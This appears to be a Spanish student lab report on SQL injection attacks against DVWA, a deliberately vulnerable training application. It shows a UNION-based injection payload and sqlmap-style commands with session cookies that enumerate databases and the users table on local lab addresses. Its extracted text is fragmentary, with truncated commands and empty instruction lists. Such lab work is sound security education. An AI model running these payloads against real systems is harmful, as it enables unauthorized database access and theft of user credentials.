AV MSI Actividad2 SanchezCruzDamianAugusto
AV MSI Actividad2 SanchezCruzDamianAugusto
AV MSI Actividad2 SanchezCruzDamianAugusto
La correspondencia relacionada con este trabajo debe ser dirigida a Damián Augusto
Contacto: [email protected]
Encabezado: ATAQUES SQL INJECTION CONTRA DVWA
2
Índice General
Instrucciones ........................................................................................................................................3
Desarrollo .............................................................................................................................................4
Apartado 1 .........................................................................................................................................4
Apartado 2 .........................................................................................................................................8
Encabezado: ATAQUES SQL INJECTION CONTRA DVWA
3
Instrucciones
Apartado 2:
En este apartado el alumno deberá usar herramientas automáticas de explotación, por ejemplo,
SQLMap. El alumno deberá:
.
Encabezado: ATAQUES SQL INJECTION CONTRA DVWA
4
Desarrollo
Apartado 1
Al ingresar 1 y pulsar submit se retorna los usuarios por que envía los parámetros por un
método get.
• El alumno deberá usar para la explotación los comandos SQL UNION y CONCAT
Ingresamos %' or '0'=0 union select null, version() # generamos una consulta de versión de la
base de datos instalada
Encabezado: ATAQUES SQL INJECTION CONTRA DVWA
8
Apartado 2:
En este apartado el alumno deberá usar herramientas automáticas de explotación, por ejemplo,
SQLMap. El alumno deberá:
Ejecutamos la sentencia para que nos muestre las bases de datos disponibles.
PHPSESSID=21ª5021843c8f7280a79c68b452ffce6" –u
http://192.168.116.141/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#"
Tabla guestbook:
Ejecutamos la sentencia:
PHPSESSID=21ª5021843c8f7280a79c68b452ffce6" –u
http://192.168.116.141/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#"
Tabla users
De igual forma se usa la misma sentencia, pero cambiamos el nombre de la tabla, así:
PHPSESSID=21ª5021843c8f7280a79c68b452ffce6" –u
http://192.168.100.15/dvwa/vulnerabilities/sqli/?id=1&Submit?Submit#"